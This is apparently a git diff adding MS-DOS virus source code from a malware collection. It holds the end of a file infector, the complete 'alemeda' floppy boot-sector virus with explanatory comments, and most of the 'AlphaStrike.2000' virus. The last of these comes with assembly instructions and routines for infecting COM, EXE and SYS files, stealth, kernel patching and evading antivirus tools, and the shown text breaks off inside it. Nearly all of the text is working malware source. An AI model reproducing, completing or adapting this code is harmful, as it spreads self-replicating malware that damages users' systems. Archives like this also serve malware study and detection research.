lea dx,[bp+newDTA+30] ; filename in DTA + int 21h + xchg ax,bx + ret + +attributes: + mov ax,4301h ; Set attributes to cx + lea dx,[bp+newDTA+30] ; filename in DTA + int 21h + ret + +write: + pop bx ; Restore file handle + pop bp ; Restore relativeness + mov ah,40h ; Write to file + lea dx,[bp+decrypt] ; Concatenate virus + mov cx,heap-decrypt ; # bytes to write + int 21h + push bx + push bp +endwrite: + +int24: ; New int 24h (error) handler + mov al,3 ; Fail call + iret ; Return control + +exe_mask db '*.exe',0 +com_mask db '*.com',0 +dot_dot db '..',0 +heap: ; Variables not in code +; The following code is the buffer for the write function +code_store: db (startencrypt-decrypt)*2+(endwrite-write)+1 dup (?) +oldint24 dd ? ; Storage for old int 24h handler +backslash db ? +origdir db 64 dup (?) ; Current directory buffer +newDTA db 43 dup (?) ; Temporary DTA +numinfec db ? ; Infections this run +buffer db 1ah dup (?) ; read buffer +endheap: ; End of virus +end entry_point diff --git a/MSDOS/Virus.MSDOS.Unknown.alemeda.asm b/MSDOS/Virus.MSDOS.Unknown.alemeda.asm new file mode 100644 index 00000000..287ade7e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.alemeda.asm @@ -0,0 +1,381 @@ +;-----------------------------------------------------------------------; +; This virus is of the "FLOPPY ONLY" variety. ; +; It replicates to the boot sector of a floppy disk and when it gains control +; it will move itself to upper memory. It redirects the keyboard ; +; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time ; +; it will attempt to infect any floppy it finds in drive A:. ; +; It keeps the real boot sector at track 39, sector 8, head 0 ; +; It does not map this sector bad in the fat (unlike the Pakistani Brain) +; and should that area be used by a file, the virus ; +; will die. It also contains no anti detection mechanisms as does the ; +; BRAIN virus. It apparently uses head 0, sector 8 and not head 1 ; +; sector 9 because this is common to all floppy formats both single ; +; sided and double sided. It does not contain any malevolent TROJAN ; +; HORSE code. It does appear to contain a count of how many times it ; +; has infected other diskettes although this is harmless and the count ; +; is never accessed. ; +; ; +; Things to note about this virus: ; +; It can not only live through an ALT-CTRL-DEL reboot command, but this ; +; is its primary (only for that matter) means of reproduction to other ; +; floppy diskettes. The only way to remove it from an infected system ; +; is to turn the machine off and reboot an uninfected copy of DOS. ; +; It is even resident when no floppy is booted but BASIC is loaded ; +; instead. Then when ALT-CTRL-DEL is pressed from inside of BASIC, ; +; it activates and infectes the floppy from which the user is ; +; attempting to boot. ; +; ; +; Also note that because of the POP CS command to pass control to ; +; its self in upper memory, this virus does not to work on 80286 ; +; machines (because this is not a valid 80286 instruction). ; +; ; +; The Norton Utilities can be used to identify infected diskettes by ; +; looking at the boot sector and the DOS SYS utility can be used to ; +; remove it (unlike the Pakistani Brain). ; +;-----------------------------------------------------------------------; + ; + ORG 7C00H ; + ; +TOS LABEL WORD ;TOP OF STACK +;-----------------------------------------------------------------------; +; 1. Find top of memory and copy ourself up there. (keeping same offset); +; 2. Save a copy of the first 32 interrupt vectors to top of memory too ; +; 3. Redirect int 9 (keyboard) to ourself in top of memory ; +; 4. Jump to ourself at top of memory ; +; 5. Load and execute REAL boot sector from track 40, head 0, sector 8 ; +;-----------------------------------------------------------------------; +BEGIN: CLI ;INITIALIZE STACK + XOR AX,AX ; + MOV SS,AX ; + MOV SP,offset TOS ; + STI ; + ; + MOV BX,0040H ;ES = TOP OF MEMORY - (7C00H+512) + MOV DS,BX ; + MOV AX,[0013H] ; + MUL BX ; + SUB AX,07E0H ; (7C00H+512)/16 + MOV ES,AX ; + ; + PUSH CS ;DS = CS + POP DS ; + ; + CMP DI,3456H ;IF THE VIRUS IS REBOOTING... + JNE B_10 ; + DEC Word Ptr [COUNTER_1] ;...LOW&HI:COUNTER_1-- + ; +B_10: MOV SI,SP ;SP=7C00 ;COPY SELF TO TOP OF MEMORY + MOV DI,SI ; + MOV CX,512 ; + CLD ; + REP MOVSB ; + ; + MOV SI,CX ;CX=0 ;SAVE FIRST 32 INT VETOR ADDRESSES TO + MOV DI,offset BEGIN - 128 ; 128 BYTES BELOW OUR HI CODE + MOV CX,128 ; + REP MOVSB ; + ; + CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) + ; + PUSH ES ;ES=HI ; JUMP TO OUR HI CODE WITH + NOP + ; + PUSH DS ;DS=0 ; ES = DS + POP ES ; + ; + MOV BX,SP ; SP=7C00 ;LOAD REAL BOOT SECTOR TO 0000:7C00 + MOV DX,CX ;CX=0 ;DRIVE A: HEAD 0 + MOV CX,2708H ; TRACK 40, SECTOR 8 + MOV AX,0201H ; READ SECTOR + INT 13H ; (common to 8/9 sect. 1/2 sided!) + JB $ ; HANG IF ERROR + ; + JMP JMP_BOOT ;JMP 0000:7C00 + ; +;-----------------------------------------------------------------------; +; SAVE THEN REDIRECT INT 9 VECTOR ; +; ; +; ON ENTRY: DS = 0 ; +; ES = WHERE TO SAVE OLD_09 & (HI) ; +; WHERE NEW_09 IS (HI) ; +;-----------------------------------------------------------------------; +PUT_NEW_09: ; + DEC Word Ptr [0413H] ;TOP OF MEMORY (0040:0013) -= 1024 + ; + MOV SI,9*4 ;COPY INT 9 VECTOR TO + MOV DI,offset OLD_09 ; OLD_09 (IN OUR HI CODE!) + MOV CX,0004 ; + ; + CLI ; + REP MOVSB ; + MOV Word Ptr [9*4],offset NEW_09 + MOV [(9*4)+2],ES ; + STI ; + ; + RET ; + ; +;-----------------------------------------------------------------------; +; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR ; +;-----------------------------------------------------------------------; +ACK_KEYBD: ; + IN AL,61H ;RESET KEYBOARD THEN CONTINUE + MOV AH,AL ; + OR AL,80H ; + OUT 61H,AL ; + XCHG AL,AH ; + OUT 61H,AL ; + JMP RBOOT ; + ; +;-----------------------------------------------------------------------; +; DATA AREA WHICH IS NOT USED IN THIS VERSION ; +; REASON UNKNOWN ; +;-----------------------------------------------------------------------; +TABLE DB 27H,0,1,2 ;FORMAT INFORMATION FOR TRACK 39 + DB 27H,0,2,2 ; (CURRENTLY NOT USED) + DB 27H,0,3,2 ; + DB 27H,0,4,2 ; + DB 27H,0,5,2 ; + DB 27H,0,6,2 ; + DB 27H,0,7,2 ; + DB 27H,0,8,2 ; + ; +;A7C9A LABEL BYTE ; + DW 00024H ;NOT USED + DB 0ADH ; + DB 07CH ; + DB 0A3H ; + DW 00026H ; + ; +;L7CA1: ; + POP CX ;NOT USED + POP DI ; + POP SI ; + POP ES ; + POP DS ; + POP AX ; + POPF ; + JMP 1111:1111 ; + ; +;-----------------------------------------------------------------------; +; IF ALT & CTRL & DEL THEN ... ; +; IF ALT & CTRL & ? THEN ... ; +;-----------------------------------------------------------------------; +NEW_09: PUSHF ; + STI ; + ; + PUSH AX ; + PUSH BX ; + PUSH DS ; + ; + PUSH CS ;DS=CS + POP DS ; + ; + MOV BX,[ALT_CTRL W] ;BX=SCAN CODE LAST TIME + IN AL,60H ;GET SCAN CODE + MOV AH,AL ;SAVE IN AH + AND AX,887FH ;STRIP 8th BIT IN AL, KEEP 8th BIT AH + ; + CMP AL,1DH ;IS IT A [CTRL]... + JNE N09_10 ;...JUMP IF NO + MOV BL,AH ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP) + JMP N09_30 ; + ; +N09_10: CMP AL,38H ;IS IT AN [ALT]... + JNE N09_20 ;...JUMP IF NO + MOV BH,AH ;(BH=08 ON KEY DOWN, BH=88 ON KEY UP) + JMP N09_30 ; + ; +N09_20: CMP BX,0808H ;IF (CTRL DOWN & ALT DOWN)... + JNE N09_30 ;...JUMP IF NO + ; + CMP AL,17H ;IF [I]... + JE N09_X0 ;...JUMP IF YES + CMP AL,53H ;IF [DEL]... + JE ACK_KEYBD ;...JUMP IF YES + ; +N09_30: MOV [ALT_CTRL],BX ;SAVE SCAN CODE FOR NEXT TIME + ; +N09_90: POP DS ; + POP BX ; + POP AX ; + POPF ; + ; + DB 0EAH ;JMP F000:E987 +OLD_09 DW ? ; + DW 0F000H ; + ; +N09_X0: JMP N09_X1 ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +RBOOT: MOV DX,03D8H ;DISABLE COLOR VIDEO !?!? + MOV AX,0800H ;AL=0, AH=DELAY ARG + OUT DX,AL ; + CALL DELAY ; + MOV [ALT_CTRL],AX ;AX=0 ; + ; + MOV AL,3 ;AH=0 ;SELECT 80x25 COLOR + INT 10H ; + MOV AH,2 ;SET CURSOR POS 0,0 + XOR DX,DX ; + MOV BH,DH ; PAGE 0 + INT 10H ; + ; + MOV AH,1 ;SET CURSOR TYPE + MOV CX,0607H ; + INT 10H ; + ; + MOV AX,0420H ;DELAY (AL=20H FOR EOI BELOW) + CALL DELAY ; + ; + CLI ; + OUT 20H,AL ;SEND EOI TO INT CONTROLLER + ; + MOV ES,CX ;CX=0 (DELAY) ;RESTORE FIRST 32 INT VECTORS + MOV DI,CX ; (REMOVING OUR INT 09 HANDLER!) + MOV SI,offset BEGIN - 128 ; + MOV CX,128 ; + CLD ; + REP MOVSB ; + ; + MOV DS,CX ;CX=0 ;DS=0 + ; + MOV Word Ptr [19H*4],offset NEW_19 ;SET INT 19 VECTOR + MOV [(19H*4)+2],CS ; + ; + MOV AX,0040H ;DS = ROM DATA AREA + MOV DS,AX ; + ; + MOV [0017H],AH ;AH=0 ;KBFLAG (SHIFT STATES) = 0 + INC Word Ptr [0013H] ;MEMORY SIZE += 1024 (WERE NOT ACTIVE) + ; + PUSH DS ;IF BIOS F000:E502 == 21E4... + MOV AX,0F000H ; + MOV DS,AX ; + CMP Word Ptr [0E502H],21E4H ; + POP DS ; + JE R_90 ; + INT 19H ; IF NOT...REBOOT + ; +R_90: JMP 0F000:0E502H ;...DO IT ?!?!?! + ; +;-----------------------------------------------------------------------; +; REBOOT INT VECTOR ; +;-----------------------------------------------------------------------; +NEW_19: XOR AX,AX ; + ; + MOV DS,AX ;DS=0 + MOV AX,[0410] ;AX=EQUIP FLAG + TEST AL,1 ;IF FLOPPY DRIVES ... + JNZ N19_20 ;...JUMP +N19_10: PUSH CS ;ELSE ES=CS + POP ES ; + CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) + INT 18H ;LOAD BASIC + ; +N19_20: MOV CX,0004 ;RETRY COUNT = 4 + ; +N19_22: PUSH CX ; + MOV AH,00 ;RESET DISK + INT 13 ; + JB N19_81 ; + MOV AX,0201 ;READ BOOT SECTOR + PUSH DS ; + POP ES ; + MOV BX,offset BEGIN ; + MOV CX,1 ;TRACK 0, SECTOR 1 + INT 13H ; +N19_81: POP CX ; + JNB N19_90 ; + LOOP N19_22 ; + JMP N19_10 ;IF RETRY EXPIRED...LOAD BASIC + ; +;-----------------------------------------------------------------------; +; Reinfection segment. ; +;-----------------------------------------------------------------------; +N19_90: CMP DI,3456 ;IF NOT FLAG SET... + JNZ RE_INFECT ;...RE INFECT + ; +JMP_BOOT: ;PASS CONTROL TO BOOT SECTOR + JMP 0000:7C00H ; + ; +;-----------------------------------------------------------------------; +; Reinfection Segment. ; +;-----------------------------------------------------------------------; +RE_INFECT: ; + MOV SI,offset BEGIN ;COMPARE BOOT SECTOR JUST LOADED WITH + MOV CX,00E6H ; OURSELF + MOV DI,SI ; + PUSH CS ; + POP ES ; + CLD ; + REPE CMPSB ; + JE RI_12 ;IF NOT EQUAL... + ; + INC Word Ptr ES:[COUNTER_1] ;INC. COUNTER IN OUR CODE (NOT DS!) + ; +;MAKE SURE TRACK 39, HEAD 0 FORMATTED ; + MOV BX,offset TABLE ;FORMAT INFO + MOV DX,0000 ;DRIVE A: HEAD 0 + MOV CH,40-1 ;TRACK 39 + MOV AH,5 ;FORMAT + JMP RI_10 ;REMOVE THE FORMAT OPTION FOR NOW ! + ; +; <<< NO EXECUTION PATH TO HERE >>> ; + JB RI_80 ; + ; +;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0 +RI_10: MOV ES,DX ;ES:BX = 0000:7C00, HEAD=0 + MOV BX,offset BEGIN ;TRACK 40H + MOV CL,8 ;SECTOR 8 + MOV AX,0301H ;WRITE 1 SECTOR + INT 13H ; + ; + PUSH CS ; (ES=CS FOR PUT_NEW_09 BELOW) + POP ES ; + JB RI_80 ;IF WRITE ERROR...JUMP TO BOOT CODE + ; + MOV CX,0001 ;WRITE INFECTED BOOT SECTOR ! + MOV AX,0301 ; + INT 13H ; + JB RI_80 ; IF ERROR...JUMP TO BOOT CODE + ; +RI_12: MOV DI,3456H ;SET "JUST INFECTED ANOTHER ONE"... + INT 19H ;...FLAG AND REBOOT + ; +RI_80: CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) + DEC Word Ptr ES:[COUNTER_1] ; (DEC. CAUSE DIDNT INFECT) + JMP JMP_BOOT ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +N09_X1: MOV [ALT_CTRL],BX ;SAVE ALT & CTRL STATUS + ; + MOV AX,[COUNTER_1] ;PUT COUNTER_1 INTO RESET FLAG + MOV BX,0040H ; + MOV DS,BX ; + MOV [0072H],AX ; 0040:0072 = RESET FLAG + JMP N09_90 ; + ; +;-----------------------------------------------------------------------; +; DELAY ; +; ; +; ON ENTRY AH:CX = LOOP COUNT ; +;-----------------------------------------------------------------------; +DELAY: SUB CX,CX ; +D_01: LOOP $ ; + SUB AH,1 ; + JNZ D_01 ; + RET ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +A7DF4 DB 27H,00H,8,2 + +COUNTER_1 DW 001CH +ALT_CTRL DW 0 +A7DFC DB 27H,0,8,2 + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.alpha.asm b/MSDOS/Virus.MSDOS.Unknown.alpha.asm new file mode 100644 index 00000000..296567c9 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.alpha.asm @@ -0,0 +1,890 @@ +; AlphaStrike.2000 or whatever its called by Neurobasher. disasm by retch. +; there are no comments. there are no need for comments unless you are lame. +; +; GREETZ R LAYME SO I WEEL NOT DO NE. +; +; 2 COMPYLE: +; tasm /m alpha.asm (EYE UZED FORE DOT SOMETHING) +; tlink alpha.obj (umm... 2.xx) +; exe2bin alpha.exe alpha.com +; +; i am contactable via retro@pcscav.com + +.model tiny +.code +.286 + +virus_start: mov di, 0F242h + mov si, word ptr ds:[2h] + sub si, di + cmp si, 1000h + call getip +getip: mov bp, sp + mov bp, [bp] + cld + mov ax, 4458h + int 21h + jb checkifdosinhma + mov ds, es:[bx+0Eh] + mov si, 0Bh + jmp addressatSI +sysentry: pushf + pusha + push ds + push es + jmp virus_start +checkifdosinhma:mov ax, 3306h + int 21h + cmp al, 6 + jnz checkdosversion + cmp dh, 10h + jnz go_abortinstall + mov ax, 0FFC4h + jmp compareints +checkdosversion:mov ah, 30h + int 21h + xchg al, ah + cmp ax, 31Eh + mov ax, 1Bh + jb go_abortinstall +compareints: mov cx, 0Ah + mov ds, cx + mov es, cx + mov si, 14h + mov bx, si + lea di, [bx+si] + cmpsw + jnz abortinstall + cmpsw +go_abortinstall:jnz abortinstall + lds si, [bx] + add si, ax + cmp al, 1Bh + jz checkifkernelpatched + mov si, [si+8] +addressatSI: lds si, [si] +checkifkernelpatched: + cmp byte ptr [si], 0EAh + jz abortinstall + mov cs:[bp+(kernaladdress )-getip], si + mov cs:[bp+(kernaladdress+2)-getip], ds + call getmemory + jnz abortinstall + lea si, [bp+(virus_start)-getip] + push cs + pop ds + mov es, cx + mov cx, offset header + rep movsb + sub ax, ax + mov cl, 0C0h + rep stosb + mov di, offset newint21 + mov es:[di+1], al + lds si, ds:[bp+(kernaladdress)-getip] + mov ax, [si] + mov cl, 6Ch + mov bx, 6 + cmp al, 0FAh + jz patchkernel + mov bl, 7 + cmp al, 2Eh + jz patchkernel + mov cl, 69h + mov bl, 5 + cmp al, 80h + jnz abortinstall +patchkernel: mov es:[di+savecmp-newint21], cl + add bx, si + mov es:[di+kernaladdress-newint21], bx + mov byte ptr [si], 0EAh + mov [si+1], di + mov [si+3], es +abortinstall: pop ax + sub si, si + mov ax, ss + cmp ah, 90h + jz restoresys + mov ah, 62h + int 21h + push bx + mov ds, bx + mov cx, [si+2Ch] + jcxz restorehost + mov ds, cx + mov ch, 8 +findcomspec: cmp word ptr [si], 4F43h + jnz keeplooking + cmp word ptr [si+6], 3D43h + jz foundcomspec +keeplooking: inc si + loop findcomspec + jmp restorehost +foundcomspec: mov ax, 3D00h + lea dx, [si+8] + int 21h + xchg ax, bx + mov ah, 3Eh + int 21h +restorehost: pop ax + mov ds, ax + mov es, ax + add ax, 10h + mov bx, ax + db 81h,0C3h +savess dw 0FFF0h + cli + db 0BCh +savesp dw 0FFFEh + mov ss, bx + db 5 +savecs dw 0FFF0h + mov cs:[bp+jumpsegment-getip], ax + cmp sp, 0FFFEh + jnz zeroregs + mov word ptr ds:100h, 20CDh +first2 = $-2 + mov byte ptr ds:102h, 90h +next1 = $-1 +zeroregs: sub ax, ax + sub bx, bx + sub cx, cx + cwd + sub si, si + sub di, di + sub bp, bp + sti + jmp near ptr jumptohost + db 0EAh +jumptohost db 0EAh +saveip dw 100h +jumpsegment dw 0 +restoresys: pop es + pop ds + mov word ptr [si+8], 0 +sysret2 = $-2 + popa + popf + db 68h +sysret dw 0 + ret +getmemory: call getlastmcb + mov ax, ds + mov bx, [si+3] + sub bx, dx + add ax, bx + xchg ax, cx + xchg ax, bx + jmp setnewmcbsize +setlastmcbsize: call getlastmcb + dec ax ; ax=cs + mov cx, ax ; cx=ax +sublastmcbseg: sub ax, bx ; ax=ax-lastmcbseg +setnewmcbsize: dec ax + or di, di + jnz dontsetmcbsize + mov [si+3], ax +dontsetmcbsize: ret +modifytomseginpsp: + mov ah, 62h + int 21h + mov ds, bx + int 12h + shl ax, 6 + sub ax, 87h + mov ds:2, ax +hideourmem: call getlastmcb + add ax, dx ; ax=virusparasize+virusseg+1 + jmp sublastmcbseg +getlastmcb: push es + mov ah, 52h + int 21h + mov ds, es:[bx-2] + mov ax, 5802h + int 21h + cbw + push ax + mov ax, 5803h + mov bx, 1 + int 21h ; set umb's as part of chain + sub si, si + mov di, si +getlastmcbloop: call getnextmcb + jnz getlastmcbloop + pop bx + push ax + mov ax, 5803h + int 21h + pop bx + pop es + mov ax, cs + inc ax + mov dx, 87h ; 2160d / 10h + ret +getnextmcb: cmp word ptr [si+10h], 20CDh + jnz checkiflast + cmp byte ptr [si+15h], 0EAh + jnz checkiflast + inc di +checkiflast: cmp byte ptr [si], 5Ah ; 'Z' + jz islastblock + mov ax, ds + inc ax + add ax, [si+3] + mov ds, ax +islastblock: ret +newint21: db 0EBh +virusactive db 4Ch + mov cs:saveds, ds + push cs + pop ds + mov savedi, di + mov di, offset saveds + mov byte ptr [di+virusactive-saveds], 4Ch + mov [di+savees-saveds], es + mov [di+saveax-saveds], ax + mov [di+savebx-saveds], bx + mov [di+savecx-saveds], cx + mov [di+savedx-saveds], dx + mov [di+savesi-saveds], si + mov [di+savebp-saveds], bp + push cs + pop es + mov di, offset functions + db 0B9h +stealthmode dw 14h + xchg al, ah + xor al, 5Fh + cld + repne scasb + jnz exithandler + sub di, offset functions+1 + shl di, 1 + add di, offset functionoffsets + push offset exithandler + push word ptr [di] + jmp near ptr restoreregs +exithandler: call restoreregsandsetvirusactive +emulateoldkernal: + cmp ah, 6Ch +savecmp = $-1 + ja zeroal_iret + cli + db 0EAh +kernaladdress dd 0FDC840FEh +writeheader: mov ah, 40h + mov cx, 18h +readwritefromsi:mov dx, si +int21: cli + pushf + call cs:kernaladdress + ret +zeroal_iret: mov al, 0 + iret +restoreregsandsetvirusactive: + call near ptr restoreregs +setvirusactive: mov cs:virusactive, 0 + ret +memstealth: call setlastmcbsize ; 48h/49h/4Ah +restoreregs: db 0B8h +saveds dw 9850h + mov ds, ax + db 0B8h +savees dw 6D8h + mov es, ax + db 0B8h +saveax dw 4B00h + db 0BBh +savebx dw 241h + db 0B9h +savecx dw 209h + db 0BAh +savedx dw 40E6h + db 0BEh +savesi dw 0E4h + db 0BFh +savedi dw 0 + db 0BDh +savebp dw 6914h + ret +loc_0_272: mov dx, 3F5h + mov al, 4 + mov ch, 4 + out dx, al + loop $ + mov ch, 4 + out dx, al + loop $ + in al, dx + test al, 40h + ret +message db 002h,0E0h,052h,0BFh,0B4h,0B0h,0B8h,0BFh,0E0h,0ADh + db 0ACh,0AEh,0B7h,0B5h,0BBh,051h,0E0h,007h,0E0h,0BFh + db 09Ch,08Ah,09Fh,092h,09Dh,09Bh,09Ch,0E0h,0ACh,09Fh + db 09Dh,08Ch,097h,09Dh,09Fh,094h,0E0h,0AAh,097h,08Eh + db 09Fh,094h,0E0h,0B7h,093h,090h,094h,09Fh,092h,08Ch + db 0E0h,09Eh,087h,0E0h,0B2h,0BBh,0ABh,0AEh,0B1h,0BEh + db 0BFh,0ADh,0B8h,0BBh,0AEh,0D9h,0C7h,0CDh,0E0h,0D1h + db 0E0h,0B9h,09Bh,08Eh,093h,09Fh,092h,087h,0E0h,002h +setnofilestealth: + mov byte ptr cs:stealthmode, 12h +activate: ret + call clearscreen + mov ah, 2 + mov bh, 0 + mov dx, 0C00h + int 10h + mov si, offset message + mov cx, 4Eh +displayloop: lods byte ptr cs:[si] + neg al + int 29h + loop displayloop + xor ax, ax + int 16h +clearscreen: mov ax, 3 + int 10h +setnoactivate: mov byte ptr cs:activate, 0C3h + ret +execute: call setfullstealth + call setnoactivate + cmp al, 1 + mov al, 90h + call setdirstealth + jnz infectdx + mov ax, 3D02h + int 21h + jb ret3 + xchg ax, bx + call disinfecthandle + mov ah, 3Eh + int 21h + mov byte ptr ds:activate, 90h +ret3: ret +infectsi: mov dx, si +infectdx: cmp ax, 4300h + jz ret3 + call sethandletozero + cmp ah, 3Dh + jnz dontsetfullstealth + call setfullstealth +dontsetfullstealth: + mov si, dx + mov di, offset buffer + push cs + pop es +copyname: lodsb + or al, al + jz namecopied + stosb + jmp copyname +namecopied: stosb + mov cl, byte ptr cs:saveax+1 + mov ax, [si-7] + mov bx, [si-0Bh] + cmp cl, 3Dh + jnz notopen + db 0EBh +dontopenchklist db 16h + cmp ax, 5453h ; chkliST? + jnz notopen + cmp bx, 4B48h ; cHKlist? + jnz notopen + pop ax + call restoreregsandsetvirusactive + mov ax, 2 + stc + retf 2 +notopen: cmp cl, 4Bh + jnz checkifavactive + mov cl, 16h + cmp ax, 5641h + jnz notmsavorcpav + mov cl, 0 +notmsavorcpav: mov cs:dontopenchklist, cl + cmp bx, 5343h + jz setmemstealthonly + cmp bx, 4142h + jz setmemstealthonly + cmp ax, 4148h + jz setmemstealthonly + cmp ax, 4A52h + jz setmemstealthonly + cmp word ptr [si-8], 495Ah + jnz leavestealthmode +setmemstealthonly: + mov byte ptr cs:stealthmode, 8 +leavestealthmode: + push ax + mov ax, 160Ah + int 2Fh + cmp al, 0Ah + pop ax + jnz checkifavactive + cmp ax, 5641h + jz checkifavactive + cmp bx, 544Eh + jz checkifavactive + call hideourmem +checkifavactive: + mov bx, 0FF0Fh + xchg ax, bx + int 21h + cmp al, 1 + jz ret4 + mov bl, 0 + call vsafe + push cs + pop ds + mov ah, 2Fh + int 21h + push es + push bx + mov ah, 1Ah + mov dx, offset tempdta + int 21h + mov ax, 3524h + int 21h + push es + push bx + mov ah, 25h + mov dx, offset zeroal_iret + int 21h + mov ah, 4Eh + mov cl, 27h + call setdxtobuffer_int21 + jb restoreint24anddta + mov si, offset header + sub di, di + mov al, [si+18h] + mov attribs, al + cmp byte ptr [si], 2 + ja notdriveAorB + call loc_0_272 + jz checkfiletype +restoreint24anddta: + mov ax, 2524h + pop dx + pop ds + int 21h + mov ah, 1Ah + pop dx + pop ds + int 21h +togglevsafe db 0B3h +vsafestatus db 16h +vsafe: mov ax, 0FA02h + mov dx, 5945h + int 16h + mov cs:vsafestatus, cl +ret4: ret +notdriveAorB: cmp [si+12h], di + jnz checkfiletype + cmp word ptr [si+10h], 2 + jb restoreint24anddta + cmp byte ptr [si], 3 + jb checkfiletype + mov ah, 2Ah + int 21h + sub cx, 7BCh + mov ax, [si+1Bh] + shr ax, 1 + cmp ah, cl + jnz checkfiletype + shr ax, 4 + and al, 0Fh + cmp al, dh + jz restoreint24anddta +checkfiletype: mov bp, offset setcarry_ret + cmp word ptr [si+21h], 4254h ; TB* + jz restoreint24anddta + cmp word ptr [si+0Ch], 4F43h ; CO + jnz notcominfection + mov bp, offset infectcom +notcominfection:cmp word ptr [si+1Eh], 0Bh + jb restoreint24anddta + cmp byte ptr [si+1Ch], 0C8h + jnb restoreint24anddta + mov al, [si+18h] + and al, 7 + jz attributesok + sub cx, cx + call setattribs + jb restoreint24anddta +attributesok: mov ax, 3D02h + call setdxtobuffer_int21 + jb near ptr restoreattribs + xchg ax, bx + mov ah, 3Fh + mov cx, 19h + call readwritefromsi + mov ax, [si] + xchg al, ah + cmp ax, 4D5Ah + jnz notexeinfection + mov bp, offset infectexe + jmp notsysinfection +notexeinfection:cmp ax, 0FFFFh + jnz notsysinfection + mov bp, offset infectsys +notsysinfection:call bp + jb dontwriteheader + call writeheader +dontwriteheader:mov ax, 5700h + mov cx, [si+19h] + mov dx, [si+1Bh] + inc ax + int 21h + mov ah, 3Eh + int 21h +restoreattribs db 0B1h +attribs db 20h + call setattribs + jmp restoreint24anddta +setattribs: mov ax, 4301h +setdxtobuffer_int21: + mov ch, 0 + mov dx, offset buffer + jmp int21 +infectexe: cmp byte ptr [si+18h], 40h ;WINDOZE EXE ? + jz setcarry_ret + mov ax, [si+4] + dec ax + mov cx, 200h + mul cx + add ax, [si+2] + adc dx, di + cmp [si+1Dh], ax + jnz setcarry_ret + cmp [si+1Fh], dx + jz nointernaloverlays +setcarry_ret: stc + ret +nointernaloverlays: + mov ax, [si+0Eh] + mov ds:savess, ax + mov ax, [si+10h] + mov ds:savesp, ax + mov ax, [si+16h] + mov ds:savecs, ax + mov ax, [si+14h] + mov ds:saveip, ax + call appendvirus + jb exitinfectexe + mov ax, [si+8] + mov cl, 10h + mul cx + neg ax + not dx + add ax, [si+1Dh] + adc dx, di + add dx, [si+1Fh] + div cx + mov [si+16h], ax + mov [si+14h], dx + dec ax + mov [si+0Eh], ax + mov word ptr [si+10h], 9D2h + add word ptr [si+0Ah], 0ADh + mov ax, [si+1Dh] + mov dx, [si+1Fh] + add ax, virussize + adc dx, di + mov cx, 200h + div cx + inc ax + mov [si+4], ax + mov [si+2], dx + clc +exitinfectexe: ret +infectcom: cmp word ptr [si+1Eh], 0D6h + ja exitcominfect + mov ax, [si] + mov word ptr ds:first2, ax + mov al, [si+2] + mov byte ptr ds:next1, al + mov ax, 0FFF0h + mov ds:savecs, ax + mov ds:savess, ax + mov word ptr ds:saveip, 100h + mov word ptr ds:savesp, 0FFFEh + call appendvirus + jb exitcominfect + mov byte ptr [si], 0E9h + mov ax, -3 ;0FFFDh + add ax, [si+1Dh] + mov [si+1], ax + clc +exitcominfect: ret +infectsys: mov ax, [si+8] + mov word ptr ds:sysret, ax + mov word ptr ds:sysret2, ax + call appendvirus + jb ret5 + mov ax, [si+1Dh] + add ax, offset sysentry + mov [si+8], ax + clc +ret5: ret +appendvirus: mov al, 2 + call lseek + mov ah, 40h + mov cx, virussize + cwd + call int21 + cmp ax, cx + stc + jnz ret1 + add byte ptr [si+1Ch], 0C8h +lseekstart: mov al, 0 +lseek: mov ah, 42h + cwd + mov cx, dx +doint21: int 21h +ret1: ret +lseekbeforeend: mov ax, 4202h + mov cx, 0FFFFh + jmp doint21 +checkhandle: cmp bl, 5 ;LAME HANDLE CHEQ. + jb exittimestealth +checkinfection: mov ax, 5700h + int 21h + jb exittimestealth + cmp dh, 0C8h +exittimestealth:ret +blocklseek: cmp al, 2 + jnz ret1 + call checkinfection + jb ret1 + pop ax + call near ptr restoreregs + push cx + sub dx, virussize + sbb cx, 0 + int 21h + pop cx + jmp setvirusactive_exit +setnodirstealth:mov al, 0C3h +setdirstealth: mov byte ptr cs:fcbdirstealth, al + ret +fcbdirstealth: nop + inc sp + inc sp + int 21h + cmp al, 0FFh + jz setvirusactive_exit + pushf + push ax + call getdta + cmp byte ptr [bx], 0FFh + jnz notextended + add bx, 7 +notextended: cmp [bx+1Ah], al + jb exitdirstealth + sub [bx+1Ah], al + add bx, 3 + jmp stealthdirsize +getdta: mov ah, 2Fh + int 21h + mov al, 0C8h + push es + pop ds + ret +asciidirstealth:inc sp + inc sp + int 21h + jb setvirusactive_exit + pushf + push ax + call getdta + cmp [bx+19h], al + jb exitdirstealth + sub [bx+19h], al +stealthdirsize: cmp word ptr [bx+1Bh], 0Bh + jb exitdirstealth + sub word ptr [bx+1Ah], virussize + sbb word ptr [bx+1Ch], 0 +exitdirstealth: call restoreregs + pop ax + popf +setvirusactive_exit: + call setvirusactive + jmp exitkeepflags +readoldheader: mov al, 1 + call lseek + push cs + pop ds + mov oldposlo, ax + mov oldposhi, dx + mov si, offset header + cmp handle, bl + jz ret0 + mov dx, 0FFDFh + call lseekbeforeend + mov ah, 3Fh + mov cx, 21h + call readwritefromsi + mov handle, bl +lseektooldpos: mov ax, 4200h + db 0B9h +oldposhi dw 0 + db 0BAh +oldposlo dw 0 + int 21h +ret0: ret +disinfecthandle:call checkhandle + jb ret0 + push cx + push dx + call readoldheader + call lseekstart + call writeheader + mov dx, 0F830h ; -virussize + call lseekbeforeend + mov ah, 40h + sub cx, cx + int 21h + pop dx + pop cx + sub dh, 0C8h + mov ax, 5701h + int 21h + jmp lseektooldpos +stealthread: mov bp, cx + call checkhandle + jb ret0 + pop ax + call readoldheader + sub ax, [si+1Dh] + sbb dx, 0 + sub dx, [si+1Fh] + js adjustread + call restoreregsandsetvirusactive + sub ax, ax + clc 